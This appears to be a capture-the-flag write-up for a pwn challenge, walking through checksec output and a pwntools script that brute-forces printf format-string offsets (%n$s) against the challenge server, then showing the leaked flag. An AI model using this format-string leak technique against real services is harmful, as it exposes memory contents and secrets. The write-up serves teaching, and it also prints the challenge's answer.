Logo
Guardians of the Galaxy

Guardians of the Galaxy

enscribe enscribe
April 6, 2022
1 min read
guardians-of-the-galaxy
Guardians of the Galaxy
Solver
e enscribe
Author
GlitchArchetype
Category
pwn
Points
100
Files
guardians
Remote
nc 0.cloud.chals.io 12690
Flag
shctf{im_distracting_you}

Ronan the Accuser has the Power Stone. Can Starlord find a successful distraction format?

Terminal window
$ checksec guardians
[*] '/home/kali/ctfs/shctf/guardians/guardians'
    Arch:     amd64-64-little
    RELRO:    Full RELRO
    Stack:    No canary found
    NX:       NX enabled
    PIE:      PIE enabled

Let’s look at what happens when you run that binary given to us:

Terminal window
$ ./guardians
Error, please message admins with 'infinity_error'.

This error is because the binary is probably trying to reference a flag.txt within its directory that doesn’t exist. Let’s create one and run it again:

Terminal window
$ touch flag.txt && echo "FLAGHERE" > flag.txt
$ ./guardians
Does Quill manage to win the dance battle?

There, we got it to work locally. Since we know that this is problem a format string vulnerability from the “find a successful distraction format” part of the description, let’s assume that the vulnerability is it writing our input to the stack with printf(). We will need to work our way up the stack with the format %n$s, where n is the decimal index of the argument you want, and s is the printf() specifier for a string of characters. Here is a Python script used to brute force our way up:

solve.py
#!/usr/bin/env python3
from pwn import *


for i in range(0, 100):
    p = remote("0.cloud.chals.io", 12690)
    log.info(f"Trying offset {i}...")
    p.sendline(bytes((f"%{str(i)}$s"), encoding="utf-8"))


    output = p.recvS()
    if 'shctf' in output:
        log.success(output)
        break

This script will send a UTF-8 encoded format string, with str(i) being the iterating variable. If its output contains the flag, the loop breaks and the script will stop. Let’s run it:

Terminal window
$ python3 exp.py
[+] Opening connection to 0.cloud.chals.io on port 12690: Done
[*] Trying offset 0...
[*] Closed connection to 0.cloud.chals.io port 12690
[+] Opening connection to 0.cloud.chals.io on port 12690: Done
[*] Trying offset 1...
[*] Closed connection to 0.cloud.chals.io port 12690
[+] Opening connection to 0.cloud.chals.io on port 12690: Done
[*] Trying offset 2...
[*] Closed connection to 0.cloud.chals.io port 12690
[+] Opening connection to 0.cloud.chals.io on port 12690: Done
[*] Trying offset 3...
[*] Closed connection to 0.cloud.chals.io port 12690
[+] Opening connection to 0.cloud.chals.io on port 12690: Done
[*] Trying offset 4...
[*] Closed connection to 0.cloud.chals.io port 12690
[+] Opening connection to 0.cloud.chals.io on port 12690: Done
[*] Trying offset 5...
[*] Closed connection to 0.cloud.chals.io port 12690
[+] Opening connection to 0.cloud.chals.io on port 12690: Done
[*] Trying offset 6...
[+] Does Quill manage to win the dance battle?
    Oh no, Ronano has seen through the distraction!
    shctf{im_distracting_you}